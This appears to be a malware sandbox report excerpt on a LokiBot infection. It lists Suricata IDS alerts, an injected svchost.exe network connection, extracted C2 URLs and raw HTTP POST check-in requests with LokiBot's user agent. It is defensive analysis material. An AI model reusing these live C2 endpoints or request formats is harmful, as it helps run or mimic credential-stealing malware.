Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49868 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.48.1:80 -> 192.168.2.4:49909
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49781 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49781 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49862 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49821 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49821 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49764 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.48.1:80 -> 192.168.2.4:49734
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50055 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49833 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.48.1:80 -> 192.168.2.4:49756
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49862 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49917 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49917 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49764 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49790 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49790 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50055 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.48.1:80 -> 192.168.2.4:49839
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50019 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49917 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50019 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49767 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49767 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49874 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49874 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49790 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.48.1:80 -> 192.168.2.4:49868
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:50055 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50019 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49790 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49790 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.48.1:80 -> 192.168.2.4:49821
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.48.1:80 -> 192.168.2.4:50039
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50019 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:50019 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.48.1:80 -> 192.168.2.4:49782
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49970 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49970 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49970 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.48.1:80 -> 192.168.2.4:49775
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50095 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49992 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49992 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49992 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49970 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49917 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49970 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49880 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49880 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49767 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50095 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50095 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49874 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49862 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49917 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49880 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49767 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49992 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49767 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49880 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.48.1:80 -> 192.168.2.4:49943
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49862 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49992 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50095 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50107 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49880 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49874 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49874 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.48.1:80 -> 192.168.2.4:50019
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.48.1:80 -> 192.168.2.4:49790
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.48.1:80 -> 192.168.2.4:49781
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:50095 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50107 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50107 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50115 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50067 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50067 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.48.1:80 -> 192.168.2.4:49764
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50115 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50125 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50107 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50061 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.48.1:80 -> 192.168.2.4:49992
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49815 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:50107 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.48.1:80 -> 192.168.2.4:49848
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50104 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50115 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50104 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50126 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50126 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50126 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50125 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50125 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50127 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50127 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.48.1:80 -> 192.168.2.4:49917
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50127 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50067 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50106 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50106 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50106 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49815 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50126 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:50126 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50067 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50125 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:50067 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50106 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:50125 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:50106 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.48.1:80 -> 192.168.2.4:50095
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49770 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50061 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50115 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50127 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49903 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49903 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:50127 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49903 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49770 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49770 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50117 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50117 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50117 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50083 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50083 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50061 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50117 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50128 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49770 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50010 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50010 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50010 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49903 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50061 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49903 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49815 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:50061 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.48.1:80 -> 192.168.2.4:50106
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50010 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:50010 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50108 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.48.1:80 -> 192.168.2.4:49862
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50128 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50128 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50104 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49931 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49770 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50083 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50128 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:50128 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:50117 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50104 -> 104.21.48.1:80

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\svchost.exe

Network Connect: 104.21.48.1 80

Jump to behavior

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://kbfvzoboss.bid/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.trade/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.win/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.top/alien/fre.php

Source: Joe Sandbox View	IP Address: 104.21.48.1 104.21.48.1
Source: Joe Sandbox View	IP Address: 104.21.48.1 104.21.48.1

Source: global traffic	HTTP traffic detected: POST /tking3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D34D978Content-Length: 176Connection: close
Source: global traffic	HTTP traffic detected: POST /tking3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D34D978Content-Length: 176Connection: close
Source: global traffic	HTTP traffic detected: POST /tking3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D34D978Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /tking3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D34D978Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /tking3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D34D978Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /tking3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D34D978Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /tking3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D34D978Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /tking3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D34D978Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /tking3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D34D978Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /tking3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D34D978Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /tking3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D34D978Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /tking3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D34D978Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /tking3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D34D978Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /tking3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D34D978Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /tking3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D34D978Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /tking3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D34D978Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /tking3/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3D34D978Content-Length: 149Connection: close
